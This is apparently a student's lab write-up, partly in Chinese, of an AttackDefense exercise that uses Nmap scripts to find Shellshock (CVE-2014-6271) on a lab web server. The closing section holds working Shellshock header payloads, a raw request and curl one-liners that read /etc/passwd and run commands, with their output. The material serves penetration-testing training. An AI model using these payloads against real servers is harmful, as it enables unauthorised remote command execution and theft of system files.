Vulnerability Scanning With Nmap Scripts

Posted by r3kind1e on March 30, 2023

Vulnerability Scanning With Nmap Scripts

Chapter 9. Nmap Scripting Engine

1
2
ifconfig
eth1: 192.152.25.2

Target IP Address: 192.152.25.3

1
nmap -sV -O 192.152.25.3
1
http://192.152.25.3
1
ls -al /usr/share/nmap/scripts/
1
ls -al /usr/share/nmap/scripts/ | grep http
1
nmap -sV -p 80 --script=http-enum 192.152.25.3
1
searchsploit apache 2.4.6
1
nano /usr/share/nmap/scripts/http-enum.nse
1
ls -al /usr/share/nmap/scripts/ | grep vuln
1
ls -al /usr/share/nmap/scripts/ | grep shellshock
1
nmap -sV -p 80 --script=http-shellshock 192.152.25.3
1
http://192.152.25.3/gettime.cgi
1
nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.152.25.3
1
ls -al /usr/share/nmap/scripts/ | grep ftp

Demo: Vulnerability Scanning With Nmap Scripts

Shellshock

Overview

OWASP Top 10 is an awareness document, which outlines the most critical security risks to web applications. Pentesting is performed according to the OWASP TOP 10 standard to reduce/mitigate the security risks.

In the exercise, we will focus on OWASP A9 Using Components with Known Vulnerabilities flaws and we perform attack against a web server which is vulnerable to CVE-2014-6071 .

Objective: Exploit the vulnerability and execute arbitrary commands on the target machine.

Instructions:

  • This lab is dedicated to you! No other users are on this network
  • Once you start the lab, you will have access to a Kali GUI instance.
  • Your Kali instance has an interface with IP address 192.X.Y.2. Run “ip addr” to know the values of X and Y.
  • Do not attack the gateway located at IP address 192.X.Y.1

Tasks

Pre-requisites

  1. Basic familiarity with TCP & UDP.

Requirements

This task does not have any requirements.

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf

Shellshock

概述

OWASP Top 10是一份意识文件,概述了 Web 应用程序最严重的安全风险。渗透测试是根据 OWASP TOP 10 标准执行的,以减少/减轻安全风险。

在练习中,我们将重点关注OWASP A9 使用具有已知漏洞的组件,并对易受CVE-2014-6071攻击的 Web 服务器进行攻击。

目的:利用该漏洞在目标机器上执行任意命令。

指示:

  • 这个实验室是献给你的!该网络上没有其他用户
  • 开始实验后,您将可以访问 Kali GUI 实例。
  • 您的 Kali 实例有一个 IP 地址为 192.XY2 的接口。运行“ip addr”以了解 X 和 Y 的值。
  • 不要攻击位于 IP 地址 192.XY1 的网关

任务

先决条件

  1. 基本熟悉 TCP 和 UDP。

要求

此任务没有任何要求。

解决方案

本实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf

我自己的思路

1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.126.145.2  netmask 255.255.255.0  broadcast 192.126.145.255
        ether 02:42:c0:7e:91:02  txqueuelen 0  (Ethernet)

Target IP Address: 192.126.145.3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@attackdefense:~# nmap -sV -O 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 20:49 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000028s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
MAC Address: 02:42:C0:7E:91:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=3/30%OT=80%CT=1%CU=30230%PV=N%DS=1%DC=D%G=Y%M=0242C0%T
OS:M=6425A8A5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.14 seconds
1
http://192.126.145.3/
1
2
root@attackdefense:~# ls -al /usr/share/nmap/scripts
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep http

http-enum

1
2
3
4
5
6
7
8
9
10
11
12
root@attackdefense:~# nmap -sV -p 80 --script=http-enum 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 21:03 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000076s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
MAC Address: 02:42:C0:7E:91:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.91 seconds
1
2
3
4
5
6
root@attackdefense:~# searchsploit apache 2.4.6
Exploits: No Result
Shellcodes: No Result
Papers: No Result
root@attackdefense:~# nano /usr/share/nmap/scripts/http-enum.nse
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep vuln

View page source.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html>
<html>
<head>
<style>
body { 
    background-image: url('static/images/background.jpg');
    background-repeat: no-repeat;
    background-attachment: fixed;
    background-position: center; 
}
</style>
	<script>
	   setInterval(function() { 
		var xhttp = new XMLHttpRequest();
		xhttp.onreadystatechange = function() {
			if (this.readyState == 4 && this.status == 200) {
				document.getElementById("output").innerHTML = this.responseText;
			}
		};
		xhttp.open("GET", "/gettime.cgi", true);
		xhttp.send();
	    }, 1000);
	</script>

</head>
<body>
	<div style="position:fixed;top:67%;left:40%" id="output" ></div>
</body>
</html>

http://192.126.145.3/gettime.cgi

CVE-2014-6271

1
2
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep shellshock                      
-rw-r--r-- 1 root root  5551 Jan  9  2019 http-shellshock.nse

Script http-shellshock

尝试利用 Web 应用程序中的“shellshock”漏洞(CVE-2014-6271 和 CVE-2014-7169)。

为了检测这个漏洞,脚本执行一个打印随机字符串的命令,然后尝试在响应主体中找到它。使用此方法不会检测到不打印回信息的 Web 应用程序。

默认情况下,脚本会在 HTTP 标头 User-Agent、Cookie 和 Referer 中注入负载。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@attackdefense:~# nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 21:21 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000045s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
MAC Address: 02:42:C0:7E:91:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
1
root@attackdefense:~# nmap -sV -p 80 --script http-shellshock --script-args uri=/gettime.cgi 192.126.145.3
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep ftp
-rw-r--r-- 1 root root  4530 Jan  9  2019 ftp-anon.nse
-rw-r--r-- 1 root root  3253 Jan  9  2019 ftp-bounce.nse
-rw-r--r-- 1 root root  3108 Jan  9  2019 ftp-brute.nse
-rw-r--r-- 1 root root  3258 Jan  9  2019 ftp-libopie.nse
-rw-r--r-- 1 root root  3295 Jan  9  2019 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root  3748 Jan  9  2019 ftp-syst.nse
-rw-r--r-- 1 root root  6007 Jan  9  2019 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root  5943 Jan  9  2019 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root  5678 Jan  9  2019 tftp-enum.nse

Shellshock exploit + vulnerable environment

1
2
3
4
5
6
7
8
GET /gettime.cgi HTTP/1.1
Host: 192.126.145.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.126.145.3/
Connection: close
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
1
2
3
root@attackdefense:~# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://192.126.145.3/gettime.cgi

uid=1(daemon) gid=1(daemon) groups=1(daemon)
1
2
3
4
5
6
7
8
9
root@attackdefense:~# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'ps -ef'" http://192.126.145.3/gettime.cgi

UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 15:17 ?        00:00:00 /usr/bin/python /usr/bin/supervisord -n
root          10       1  0 15:17 ?        00:00:00 /bin/bash /root/startup.sh
daemon        11      10  0 15:17 ?        00:00:04 /opt/apache/bin/httpd -X
daemon        12      11  0 15:17 ?        00:00:02 /opt/apache/bin/httpd -X
daemon     12062      12  0 16:25 ?        00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon     12063   12062  0 16:25 ?        00:00:00 ps -ef